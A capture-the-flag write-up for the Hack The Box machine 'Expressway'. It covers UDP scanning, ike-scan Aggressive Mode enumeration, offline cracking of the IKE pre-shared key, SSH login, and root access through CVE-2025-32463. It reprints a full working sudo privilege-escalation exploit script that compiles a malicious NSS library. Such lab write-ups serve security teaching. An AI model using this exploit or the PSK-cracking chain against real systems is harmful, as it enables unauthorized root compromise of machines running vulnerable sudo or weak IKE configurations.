HTB Expressway Writeup: Ike password crack to sudo privilege escalation
Expressway is an easy-difficulty machine that involves exploiting a weak IKE configuration by cracking the PSK to gain initial access, then escalating privileges to root through sudo and CVE-2025-32463. This writeup explains how to obtain both user and root flag on the box.
- The initial nmap scan shows us only one opened port (22-SSH):
$ nmap -sC -sV --top-ports=5000 10.129.88.123
<SNIP>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 Debian 8 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- We could have tried to brute SSH with the sets of the valid credentials, but let’s make a UDP scan first:
$ sudo nmap -sU 10.129.88.123 --top-ports=200
<SNIP>
Not shown: 196 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
69/udp open|filtered tftp
500/udp open isakmp
4500/udp open|filtered nat-t-ike- The UDP scan revealed that port 500 was open, which is commonly associated with IKE/IPsec. Since this service is often used for VPN negotiations, we can look the information on web for the further enumeration with ike-scan. As per description this tool performs IKE hosts discovery and can also fingerprint them using the retransmission backoff pattern. The initial enumeration command looks like this:
$ sudo ike-scan -M -A 10.129.88.123
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.88.123 Aggressive Mode Handshake returned
HDR=(CKY-R=bf340b79a285bda0)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
KeyExchange(128 bytes)
Nonce(32 bytes)
ID(Type=ID_USER_FQDN, Value=ike@expressway.htb)
VID=09002689dfd6b712 (XAUTH)
VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
Hash(20 bytes)- The initial ike-scan confirmed that the target was running IKE in Aggressive Mode on UDP port 500. This is especially interesting because Aggressive Mode can reveal enough information to make offline PSK cracking possible. In this case, the response disclosed the identity ike@expressway.htb together with the handshake parameters, which gave us everything needed for further enumeration and an attempt to recover the pre-shared key:
$ sudo ike-scan -A --pskcrack 10.129.88.123
Starting ike-scan 1.9.6 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.129.88.123 Aggressive Mode Handshake returned HDR=(CKY-R=9aec8d19b02c2ceb) SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) KeyExchange(128 bytes) Nonce(32 bytes) ID(Type=ID_USER_FQDN, Value=ike@expressway.htb) VID=09002689dfd6b712 (XAUTH) VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0) Hash(20 bytes)
IKE PSK parameters (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r):
389729bd6e9a190415bbb9713a4c85dfb36646518227d413324e6d2a1210918466126007e0a51bc2e666d615855b0db33b4e4e55ad529f8f7d7bbab6f3e106b777fe30d232d01ca470f451e866f8b9d0d02b0cd68c67e1072c44c4d30000a880a7adf01964cd9e1a799d29467c141963a74264990ae0f5a5a67e630c64fa3a9d:232c44a44c4719617a864419c615a8655903037f580ff2dd2287f66388c4813a17b69dea64241488ee3f58303e17816a798043e09deb431520d95faafbe9cd2a64c727ca298373628b960f6760cfa8dc309b2254da4d7bf8d7b87cd0bd1ded0895ff168a51650a12951a535da3190f2e20b68407395b1aaae0680e5774682983:9aec8d19b02c2ceb:3567f4673a7bd5d9:00000001000000010000009801010004030000240101000080010005800200028003000180040002800b0001000c000400007080030000240201000080010005800200018003000180040002800b0001000c000400007080030000240301000080010001800200028003000180040002800b0001000c000400007080000000240401000080010001800200018003000180040002800b0001000c000400007080:03000000696b6540657870726573737761792e687462:964811e67f7fd7362c2bfa0fca6e0a2e1bb93518:8b245b472f5039210091a31573022333ae22a49f4d0d77570304368026e30bd5:0aa7c737b71f44dcb3f4d54fe9388f632fab07d2
- Running ike-scan with the –pskcrack option returned the full set of parameters required for offline PSK cracking. The response confirmed that the service was using Aggressive Mode and exposed the handshake material, including the identity ike@expressway.htb. This can be passed to psk-crack:
$ psk-crack --dictionary /home/copper_nail/Desktop/rockyou.txt hashes.txt
Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "freakin<PASSWORD_REDACTED>theroad" matches SHA1 hash 4f8ad1c8d9afcccc555105c5912a9bff3f9ddcad
Ending psk-crack: 8045040 iterations in 12.410 seconds (648290.76 iterations/sec)- We can try to use obtained password and username with the SSH:
$ ssh ike@10.129.88.123
<SNIP>
ike@expressway:~$ whoami
ike
ike@expressway:~$ cat user.txt
3929c8c6<FLAG_REDACTED>c5cc891
- We have got the user flag and can use a regular enumeration routine on the box now . Eventually we find that sudo’s version is 1.9.17:
ike@expressway:/tmp$ sudo --version
Sudo version 1.9.17- After identifying the installed sudo version, we searched for public information and found that it was affected by CVE-2025-32463, a local privilege escalation vulnerability in sudo versions before 1.9.17p1.
A full explanation of this vulnerability is beyond the scope of this writeup. For a detailed analysis, please refer to the following link. In any case, the full exploit code is shown below:
#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}- We can transfer exploit.sh to the target using any preferred method, or simply recreate it directly on the machine with a text editor such as nano or vim. For this initial run nano is being used. Make the file executable, run it and read the root flag:
ike@expressway:~$ nano exploit.sh
<PASTE EXPLOIT AND SAVE IT WITH CTRL+X>
ike@expressway:~$ chmod +x exploit.sh
ike@expressway:~$ ./exploit.sh
woot!
root@expressway:/# whoami
root
root@expressway:/# cat /root/root.txt
62872b1a<FLAG_REDACTED>d208bFinal Thoughts
Congratulations! You have rooted Expressway a great beginner-friendly machine that demonstrates how weaknesses in IKE authentication can lead to initial access, followed by local privilege escalation through a vulnerable sudo version.